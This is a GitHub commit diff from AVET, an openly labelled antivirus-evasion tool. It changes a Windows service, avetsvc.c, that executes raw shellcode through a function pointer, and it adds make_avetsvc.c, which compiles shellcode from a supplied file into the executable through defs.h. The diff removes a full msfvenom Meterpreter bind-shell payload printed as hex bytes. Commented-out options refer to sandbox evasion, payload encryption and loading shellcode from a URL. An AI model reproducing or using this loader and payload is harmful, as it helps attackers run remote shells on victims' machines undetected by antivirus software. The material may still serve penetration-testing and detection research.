updates avetsvc

charygao · Jun 7, 2017 · cbd61e1 · cbd61e1
1 parent 71c7d1f
commit cbd61e1
Show file tree

Hide file tree

Showing 2 changed files with 252 additions and 22 deletions.
diff --git a/avetsvc.c b/avetsvc.c
@@ -3,6 +3,7 @@
 
 #include <windows.h>
 #include <stdio.h>
+#include "defs.h"
 
 #define SLEEP_TIME 5000
 #define LOGFILE "C:\\status.txt"
@@ -13,34 +14,19 @@ SERVICE_STATUS_HANDLE hStatus;
 void  ServiceMain(int argc, char** argv); 
 void  ControlHandler(DWORD request); 
 int InitService();
+int WriteToLog(char*);
 
 // some shellcode
 //# msfvenom -p windows/meterpreter/bind_tcp lport=8443 -f c -a x86 --platform Windows
-unsigned char buf[] = 
-"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
-"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
-"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
-"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
-"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
-"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
-"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
-"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
-"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
-"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
-"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
-"\x29\x80\x6b\x00\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a"
-"\x02\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x20\xfb\x89"
-"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85\xc0\x75"
-"\x58\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1"
-"\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04"
-"\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x2d\x8b"
-"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
-"\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f"
-"\xff\xd5\x83\xf8\x00\x7e\x07\x01\xc3\x29\xc6\x75\xe9\xc3";
-
+//unsigned char buf[] = 
+//unsigned char *shellcode = buf;
 
 void exec_shellcode(unsigned char *shellcode)
 {
+  int d=sizeof(shellcode);
+  char s[200];
+  sprintf(s,"shellcode size: %d\n",d);
+  WriteToLog(s);
   int (*funct)();
   funct = (int (*)()) shellcode;
   (int)(*funct)();

diff --git a/make_avetsvc.c b/make_avetsvc.c
@@ -0,0 +1,244 @@
+/*
+Author: Daniel Sauder
+License: https://www.gnu.org/licenses/gpl.txt or LICENSE file
+Web: https://github.com/govolution/avet
+*/
+
+#include <getopt.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void print_start();
+void print_help();
+int print_debug;
+int load_from_file;
+
+int main (int argc, char **argv)
+{
+	print_start();
+
+	print_debug = 0;
+	load_from_file = 0;
+	//char *dvalue = NULL;
+	//char *evalue = NULL;
+	char *fvalue = NULL;
+	//char *uvalue = NULL;
+	//char *wvalue = NULL;
+	int hflag = 0;
+	//int Fflag = 0;
+	//int Xflag = 0;
+	//int Eflag = 0;
+
+	int index;
+	int c;
+
+	opterr = 0;
+
+	// compute the options
+	//while ((c = getopt (argc, argv, "d:e:f:u:w:lphFXE")) != -1)
+	while ((c = getopt (argc, argv, "f:ph")) != -1)
+		switch (c)
+		{
+			/*
+			case 'd':
+				dvalue = optarg;
+				break;
+			case 'e':
+				evalue = optarg;
+				break;
+			case 'l':
+				load_from_file = 1;
+				break;
+			*/
+			case 'f':
+				fvalue = optarg;
+				break;
+			/*
+			case 'u':
+				uvalue = optarg;
+				break;
+			case 'w':
+				wvalue = optarg;
+				break;
+			*/
+			case 'h':
+				hflag = 1;
+				break;
+			/*
+			case 'F':
+				Fflag = 1;
+				break;
+			case 'X':
+				Xflag = 1;
+				break;
+			case 'E':
+				Eflag = 1;
+				break;
+			*/
+			case 'p':
+				print_debug = 1;
+				break;
+			case '?':
+				/*
+				if (optopt == 'd')
+					fprintf (stderr, "Option -%c requires an argument.\n", optopt);
+				else if (optopt == 'e')
+					fprintf (stderr, "Option -%c requires an argument.\n", optopt);
+				*/
+				if (optopt == 'f')
+					fprintf (stderr, "Option -%c requires an argument.\n", optopt);
+				/*
+				else if (optopt == 'u')
+					fprintf (stderr, "Option -%c requires an argument.\n", optopt);
+				else if (optopt == 'w')
+					fprintf (stderr, "Option -%w requires an argument.\n", optopt);
+				else if (isprint (optopt))
+					fprintf (stderr, "Unknown option `-%c'.\n", optopt);
+				*/
+				else
+					fprintf (stderr, "Unknown option character `\\x%x'.\n", optopt);
+				return 1;
+			default:
+				abort ();
+		}
+
+	// print help
+	if (hflag)
+		print_help();
+	/*else if (load_from_file)
+	{
+		//write LVALUE to defs.h
+		FILE *file_def;
+		file_def = fopen ("defs.h","w");
+
+		if (file_def == NULL)
+		{
+			printf ("Error open defs.h\n");
+			return -1;
+		}
+
+		//fseek (file_def, 0, SEEK_END);
+		fprintf (file_def, "#define LVALUE\n");
+		fclose(file_def);
+	}*/
+	// write shellcode from a given file to defs.h
+	else if (fvalue)
+	{
+		printf ("write shellcode from %s to defs.h\n", fvalue);
+
+		FILE *file_def;
+		file_def = fopen ("defs.h","w");
+
+		if (file_def == NULL)
+		{
+			printf ("Error open defs.h\n");
+			return -1;
+		}
+
+		fseek (file_def, 0, SEEK_END);
+
+		// read the shellcode file, write to defs.h
+		FILE *file_sh = fopen ( fvalue, "r" );
+
+		if ( file_sh != NULL )
+		{
+			//if(Eflag)
+			//	fprintf (file_def, "#define FVALUE \"");
+			//else
+				fprintf (file_def, "#define FVALUE \"\"\n");
+
+			char line [ 5000 ];
+
+			while ( fgets ( line, sizeof line, file_sh ) != NULL )
+				fprintf (file_def, "%s", line);           
+
+			//if(Eflag)
+			//	fprintf (file_def, "\"\n");
+			//fprintf (file_def, "\\n");
+			fclose ( file_sh );
+		}
+		else
+			printf ("Error open %s\n", fvalue);
+
+		fclose (file_def);
+	}
+	/*
+	// exec from url
+	else if (uvalue)
+	{
+		printf ("write url %s to defs.h\n", uvalue);
+
+		FILE *file_def;
+		file_def = fopen ("defs.h","w");
+
+		if (file_def == NULL)
+		{
+			printf ("Error open defs.h\n");
+			return -1;
+		}
+
+		fseek (file_def, 0, SEEK_END);
+		fprintf (file_def, "#define UVALUE \"%s\"\n", uvalue);
+
+		fclose (file_def);
+	} */
+
+	//write flags to defs.h
+	FILE *file_def;
+	file_def = fopen ("defs.h","a");
+	if (file_def == NULL)
+	{
+		printf ("Error open defs.h\n");
+		return -1;
+	}
+
+	//write LVALUE to defs.h
+	if(print_debug)
+		fprintf (file_def, "#define PRINT_DEBUG\n");
+
+	//write SANDBOX_FOPEN to defs.h
+	//if(Fflag)
+	//	fprintf (file_def, "#define SANDBOX_FOPEN\n");
+
+	//write X64 to defs.h
+	//if(Xflag)
+	//	fprintf (file_def, "#define X64\n");
+
+	//write ENCRYPT to defs.h
+	//if(Eflag)
+	//	fprintf (file_def, "#define ENCRYPT\n");
+
+	fclose(file_def);
+
+} //main
+
+void print_help()
+{
+	printf("Options:\n");
+	//printf("-l load and exec shellcode from given file, call is with mytrojan.exe myshellcode.txt\n");
+	printf("-f compile shellcode into .exe, needs filename of shellcode file\n");
+	//printf("-u load and exec shellcode from url using internet explorer (url is compiled into executable)\n");
+	//printf("-E use avets ASCII encryption, often do not has to be used\n");
+	//printf("   Note: with -l -E is mandatory\n");
+	//printf("-F use fopen sandbox evasion\n");
+	//printf("-X compile for 64 bit\n");
+	printf("-p write debug information to c:\\status.txt\n");
+	printf("-h help\n\n");
+	printf("Please refer README.md for more information\n");
+}
+
+void print_start()
+{
+	char output[] =
+		" ________  ___      ___ _______  _________  \n" 
+		"|\\   __  \\|\\  \\    /  /|\\  ___ \\|\\___   ___\\ \n"
+		"\\ \\  \\|\\  \\ \\  \\  /  / | \\   __/\\|___ \\  \\_| \n"
+		" \\ \\   __  \\ \\  \\/  / / \\ \\  \\_|/__  \\ \\  \\  \n"
+		"  \\ \\  \\ \\  \\ \\    / /   \\ \\  \\_|\\ \\  \\ \\  \\ \n"
+		"   \\ \\__\\ \\__\\ \\__/ /     \\ \\_______\\  \\ \\__\\\n"
+		"    \\|__|\\|__|\\|__|/       \\|_______|   \\|__|\n"
+		"\n\nAnti Virus Evasion Make Tool by Daniel Sauder\n"
+		"use -h for help\n\n";
+	printf("\n%s", output);
+}